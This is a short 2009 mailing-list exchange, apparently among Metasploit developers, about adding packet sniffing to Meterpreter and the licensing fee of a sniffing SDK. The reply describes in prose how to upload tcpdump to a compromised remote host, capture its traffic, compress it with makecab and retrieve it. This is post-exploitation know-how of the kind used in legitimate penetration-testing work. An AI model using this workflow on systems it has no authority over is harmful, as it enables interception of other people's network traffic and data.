On Fri, 2009-02-13 at 08:30 -0700, Bryan Richardson wrote:
> I would love to be able to write an addition to the Meterpreter Net
> extension that provides this sniffing feature. I found a packet
> sniffing SDK that looks to make it possible to be able to create a
> self-contained executable that doesn't rely on libpcap at all (it's
> the SDK used in the stand-alone version of tcpdump for Windows).
> While I'm a pretty avid Ruby developer, I'm not much of a C
> developer. :( Can someone take a look at the SDK I found and let me
> know if it could be used for this? If so, I'll take the time to see
> if I can develop an extension on my own (hopefully with help from this
> list when needed :).
Thanks for the email, keep it coming, its nice to have developer
feedback/suggestions/feature interest, you might get more feedback on
the main framework list, as im not sure how many of the devs are on both
lists right now.
Regarding the sniffer SDK, the real issue is licensing, the SDK has a
minimal licensing fee of $999 for one developer. We might be able to
trade them a blog post and press for a free license, but I am not sure a
new meterpreter extension is the kind of press they want.
Personally, I have had success uploading the static tcpdump.exe to a
remote box, capturing traffic, compressing it with makecab, and pulling
it back down. I believe there is a metepreter script out there to
automate that process as well.
Framework-Hackers mailing list